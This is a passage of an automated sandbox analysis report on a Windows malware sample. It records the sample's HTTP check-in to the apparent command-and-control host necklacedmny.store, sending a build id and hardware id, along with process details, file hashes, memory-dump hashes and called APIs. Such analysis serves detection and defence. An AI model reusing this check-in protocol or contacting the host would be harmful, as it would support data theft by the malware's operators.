                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=211&recv=603&lost=0&retrans=0&sent_bytes=2846&recv_bytes=571357&delivery_rate=2053900&cwnd=251&unsent_bytes=0&cid=43fd0124941e2562&ts=1854&x=0"


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.649743188.114.97.34432136C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 19:49:10 UTC266OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 87
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 19:49:10 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 46 32 44 38 37 32 36 36 32 36 34 39 41 44 34 31 32 39 45 32 39 34 39 38 33 30 37 34 44 37 30 42
                                                                            Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=F2D872662649AD4129E294983074D70B
                                                                            2024-10-31 19:49:11 UTC1018INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 19:49:10 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=qca1sbiaqt94ggibmdv22t0u0a; expires=Mon, 24-Feb-2025 13:35:49 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PivRC369E6QmmS7Qm48p4M2dxjvncjDQtoz%2BykpWQquIydhq80B8p2mvJWsPpKrvz0dJn9%2BqjsypTI62o9FoZWVRatlY5oanmlIPgP03RaH6of5vz%2FJvR%2BZd%2BjFayL3AJKx%2BKVk%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db62ab42af6ddae-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1224&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=989&delivery_rate=2307569&cwnd=32&unsent_bytes=0&cid=2a09fb8c0f48e5a2&ts=690&x=0"
                                                                            2024-10-31 19:49:11 UTC214INData Raw: 64 30 0d 0a 70 58 72 35 67 50 67 45 54 31 6f 6c 30 52 4f 55 65 37 61 52 78 35 75 35 64 49 34 6b 33 4e 2f 66 6e 54 43 47 31 33 30 7a 62 33 6a 2b 41 64 76 31 32 6a 35 74 4d 6c 47 6c 59 36 34 6e 6d 63 33 6f 71 6f 46 42 6f 42 62 74 36 76 47 73 41 62 58 35 54 41 55 7a 56 38 6f 63 6e 39 7a 58 59 43 6f 38 43 37 52 72 38 56 6d 61 73 36 48 76 6d 30 36 2b 43 50 36 36 2f 61 63 41 2b 2f 73 47 45 52 70 61 6e 31 69 52 39 49 78 30 64 51 59 4b 6a 54 79 6c 51 34 4f 2f 39 61 71 4d 57 72 38 56 37 2f 48 75 71 32 79 70 75 68 52 64 43 69 53 4b 43 4a 6a 75 6e 47 73 69 64 45 43 70 64 72 5a 58 6c 50 65 7a 75 59 4e 45 6f 67 61 35 2f 65 57 74 54 64 73 3d 0d 0a
                                                                            Data Ascii: d0pXr5gPgET1ol0ROUe7aRx5u5dI4k3N/fnTCG130zb3j+Adv12j5tMlGlY64nmc3oqoFBoBbt6vGsAbX5TAUzV8ocn9zXYCo8C7Rr8Vmas6Hvm06+CP66/acA+/sGERpan1iR9Ix0dQYKjTylQ4O/9aqMWr8V7/Huq2ypuhRdCiSKCJjunGsidECpdrZXlPezuYNEoga5/eWtTds=
                                                                            2024-10-31 19:49:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:15:48:55
                                                                            Start date:31/10/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0x130000
                                                                            File size:2'940'416 bytes
                                                                            MD5 hash:90A33D2FA972C6879876CFD76B3BB7F2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:15:49:41
                                                                            Start date:31/10/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe"
                                                                            Imagebase:0xcb0000
                                                                            File size:2'822'144 bytes
                                                                            MD5 hash:69621666073B77F9D5D771808DC1A7A6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Reset < >
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.2217166199.0000000001463000.00000004.00000020.00020000.00000000.sdmp, Offset: 01463000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_1463000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f56b89d7d4d00a0a5c9c5d13ef7bfe611a547a3964ef3c029c081266a0306600
                                                                              • Instruction ID: 115ef40aa03ae5ad412328abe115e7e0db9b0189bce857a3ab4f5d006ee19ff1
                                                                              • Opcode Fuzzy Hash: f56b89d7d4d00a0a5c9c5d13ef7bfe611a547a3964ef3c029c081266a0306600
                                                                              • Instruction Fuzzy Hash: 5F5365715497A29FC381CF18C8A57D6B7E2FF4322D30AC1AEC5D64A962E3219C53CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.2217166199.0000000001463000.00000004.00000020.00020000.00000000.sdmp, Offset: 01463000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_1463000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f43512a97a327db081a9570e4c0bde0e919c8aadb9388be820f47c6d23bfedd4
                                                                              • Instruction ID: b8f78a2915f32d4c64a3fb01a098838fa9342b0d74bb232c6fff4386908b7ecf
                                                                              • Opcode Fuzzy Hash: f43512a97a327db081a9570e4c0bde0e919c8aadb9388be820f47c6d23bfedd4
                                                                              • Instruction Fuzzy Hash: A4D1DEA194E7C19FD3438B3488766917FB1AF53228B1A45EBC0C5CF4B3E2694C5AC762
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.2217166199.0000000001463000.00000004.00000020.00020000.00000000.sdmp, Offset: 01463000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_1463000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9d53d91bc0c615db196219c3101d0c439cb00620e853c779bf9c65ffda67a1b3
                                                                              • Instruction ID: f17adfc2ab9856d147b83a9fa2ce713025b575a2c71053b57de9902b19d24a6d
                                                                              • Opcode Fuzzy Hash: 9d53d91bc0c615db196219c3101d0c439cb00620e853c779bf9c65ffda67a1b3
                                                                              • Instruction Fuzzy Hash: CF51FE6154E7C59FD3534B7888B62927FB0AE13224B1A45EBC0C1CF5B3E26D4C9AC762
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.2217166199.0000000001463000.00000004.00000020.00020000.00000000.sdmp, Offset: 01463000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_1463000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 9$A$\2n$\5n$e
                                                                              • API String ID: 0-1703545535
                                                                              • Opcode ID: bc2d7a947a4cf532c10709bd5b061bd56155666149ed671c516918a97c8273a7
                                                                              • Instruction ID: 98f167d0542449fcace17b981edb8458a7374c22cf4df8944f8e03d7e9d1ad0b
                                                                              • Opcode Fuzzy Hash: bc2d7a947a4cf532c10709bd5b061bd56155666149ed671c516918a97c8273a7
                                                                              • Instruction Fuzzy Hash: 04F1D96144E3C19FD3478B3488696957FB1AF23228B1E45EBC0C5CF1B3E669094ADB63

                                                                              Execution Graph

                                                                              Execution Coverage:3%
                                                                              Dynamic/Decrypted Code Coverage:27.3%
                                                                              Signature Coverage:9.1%
                                                                              Total number of Nodes:33
                                                                              Total number of Limit Nodes:2
                                                                              execution_graph 6133 cbe41b 6134 cbe92d VirtualAlloc 6133->6134 6135 cbf189 6134->6135 6109 cbb7ca 6110 cbb7cf 6109->6110 6111 cbb93a LdrInitializeThunk 6110->6111 6112 e45685 6113 e45be5 6112->6113 6114 e45c15 RegOpenKeyA 6113->6114 6115 e45c3c RegOpenKeyA 6113->6115 6114->6115 6116 e45c32 6114->6116 6117 e45c59 6115->6117 6116->6115 6118 e45c9d GetNativeSystemInfo 6117->6118 6119 e45ca8 6117->6119 6118->6119 6120 e37de1 LoadLibraryA 6121 e37df0 6120->6121 6136 e461f6 6137 e468b9 LoadLibraryA 6136->6137 6122 4931510 6123 4931558 ControlService 6122->6123 6124 493158f 6123->6124 6125 e3c344 6126 e3c2f0 CreateFileA 6125->6126 6127 e3c349 6125->6127 6129 e3c329 6126->6129 6138 e3c514 CreateFileA 6139 e3c535 6138->6139 6140 4930d48 6141 4930d93 OpenSCManagerW 6140->6141 6143 4930ddc 6141->6143 6144 4931308 6145 4931349 ImpersonateLoggedOnUser 6144->6145 6146 4931376 6145->6146

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 332 e3c299-e3c2e9 333 e3c304-e3c323 CreateFileA 332->333 334 e3c2ef 332->334 335 e3c705-e3c727 call e3c72a 333->335 336 e3c329-e3c331 call e3c334 333->336 334->333
                                                                              APIs
                                                                              • CreateFileA.KERNELBASE(-5A62AD1D), ref: 00E3C31D
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2731103687.0000000000E39000.00000040.00000001.01000000.00000006.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000006.00000002.2730877114.0000000000CB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730893202.0000000000CB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730909764.0000000000CB6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730926276.0000000000CBA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730944102.0000000000CC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731030790.0000000000E24000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731050392.0000000000E26000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731069392.0000000000E35000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731087206.0000000000E38000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731143684.0000000000E45000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731161417.0000000000E4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731179687.0000000000E56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731197141.0000000000E59000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731214779.0000000000E5A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731232310.0000000000E5D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731254811.0000000000E75000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731295932.0000000000E88000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731319251.0000000000E93000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731340280.0000000000E96000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731358682.0000000000E98000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731375774.0000000000E9B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731398740.0000000000EB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731415815.0000000000EB6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731433274.0000000000EB7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731450545.0000000000EBD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731467094.0000000000EC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731483381.0000000000ECA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731502458.0000000000ED3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731520743.0000000000ED8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731537956.0000000000EDE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731555186.0000000000EE2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731574229.0000000000EE9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731593456.0000000000EEB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731610955.0000000000EF2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731630934.0000000000EF5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731654777.0000000000F12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731673934.0000000000F15000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731700240.0000000000F42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731717712.0000000000F43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F50000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731772581.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731789510.0000000000F68000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_cb0000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: adeaa2c0e4cdd47aa7bd8e41b7870e83c33faac3e206a515ae1dab965b7cc424
                                                                              • Instruction ID: 2f10f7a6ce2efdebddb82617e66affc707f9f38ba4124e2c16a71b3c0a909e33
                                                                              • Opcode Fuzzy Hash: adeaa2c0e4cdd47aa7bd8e41b7870e83c33faac3e206a515ae1dab965b7cc424
                                                                              • Instruction Fuzzy Hash: D00104B31042666EF3109A74AE95FFB2B5CCB41374F30815AF841BB582C2A19D05AB74
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2730926276.0000000000CBA000.00000040.00000001.01000000.00000006.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000006.00000002.2730877114.0000000000CB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730893202.0000000000CB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730909764.0000000000CB6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730944102.0000000000CC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731030790.0000000000E24000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731050392.0000000000E26000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731069392.0000000000E35000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731087206.0000000000E38000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E39000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731143684.0000000000E45000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731161417.0000000000E4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731179687.0000000000E56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731197141.0000000000E59000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731214779.0000000000E5A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731232310.0000000000E5D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731254811.0000000000E75000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731295932.0000000000E88000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731319251.0000000000E93000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731340280.0000000000E96000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731358682.0000000000E98000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731375774.0000000000E9B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731398740.0000000000EB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731415815.0000000000EB6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731433274.0000000000EB7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731450545.0000000000EBD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731467094.0000000000EC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731483381.0000000000ECA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731502458.0000000000ED3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731520743.0000000000ED8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731537956.0000000000EDE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731555186.0000000000EE2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731574229.0000000000EE9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731593456.0000000000EEB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731610955.0000000000EF2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731630934.0000000000EF5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731654777.0000000000F12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731673934.0000000000F15000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731700240.0000000000F42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731717712.0000000000F43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F50000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731772581.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731789510.0000000000F68000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_cb0000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !!iH
                                                                              • API String ID: 0-3430752988
                                                                              • Opcode ID: e21b90613d6a6fa1bdb1bf8fc97d35830f78ead2db14937cba45b6007c5a38b7
                                                                              • Instruction ID: 2d67f0a46a8147e423a5266843e8994c587738c668fd7b4b1141f8aebe66b70e
                                                                              • Opcode Fuzzy Hash: e21b90613d6a6fa1bdb1bf8fc97d35830f78ead2db14937cba45b6007c5a38b7
                                                                              • Instruction Fuzzy Hash: CDE0C231904E899ACF16DFA0C8027E9362EDF40700F600525FB019AE89CBAE0D11D791

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 e45685-e45c13 3 e45c15-e45c30 RegOpenKeyA 0->3 4 e45c3c-e45c57 RegOpenKeyA 0->4 3->4 5 e45c32 3->5 6 e45c6f-e45c9b 4->6 7 e45c59-e45c63 4->7 5->4 10 e45c9d-e45ca6 GetNativeSystemInfo 6->10 11 e45ca8-e45cb2 6->11 7->6 10->11 12 e45cb4 11->12 13 e45cbe-e45ccc 11->13 12->13 15 e45cce 13->15 16 e45cd8-e45cdf 13->16 15->16 17 e45ce5-e45cec 16->17 18 e45cf2 16->18 17->18 19 e46abf-e46ac6 17->19 18->19 20 e48f7c-e48f8e 19->20 21 e46acc-e47346 19->21 21->20
                                                                              APIs
                                                                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00E45C28
                                                                              • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00E45C4F
                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 00E45CA6
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2731143684.0000000000E45000.00000080.00000001.01000000.00000006.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000006.00000002.2730877114.0000000000CB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730893202.0000000000CB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730909764.0000000000CB6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730926276.0000000000CBA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730944102.0000000000CC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731030790.0000000000E24000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731050392.0000000000E26000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731069392.0000000000E35000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731087206.0000000000E38000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E39000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731161417.0000000000E4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731179687.0000000000E56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731197141.0000000000E59000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731214779.0000000000E5A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731232310.0000000000E5D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731254811.0000000000E75000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731295932.0000000000E88000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731319251.0000000000E93000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731340280.0000000000E96000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731358682.0000000000E98000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731375774.0000000000E9B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731398740.0000000000EB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731415815.0000000000EB6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731433274.0000000000EB7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731450545.0000000000EBD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731467094.0000000000EC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731483381.0000000000ECA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731502458.0000000000ED3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731520743.0000000000ED8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731537956.0000000000EDE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731555186.0000000000EE2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731574229.0000000000EE9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731593456.0000000000EEB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731610955.0000000000EF2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731630934.0000000000EF5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731654777.0000000000F12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731673934.0000000000F15000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731700240.0000000000F42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731717712.0000000000F43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F50000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731772581.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731789510.0000000000F68000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_cb0000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: Open$InfoNativeSystem
                                                                              • String ID:
                                                                              • API String ID: 1247124224-0
                                                                              • Opcode ID: 52de0c45f3162cacab98c3699c92b0b886242836996f6473c9aa01896bb81444
                                                                              • Instruction ID: 1353439fd786d10f3b913352b818e2870d2fc8456f4161f045401cf0492aefe8
                                                                              • Opcode Fuzzy Hash: 52de0c45f3162cacab98c3699c92b0b886242836996f6473c9aa01896bb81444
                                                                              • Instruction Fuzzy Hash: 1841CB7200830EDFDB10DF60D8487EFB7E4EF05314F05192AE88592A11D7768CA4EB5A
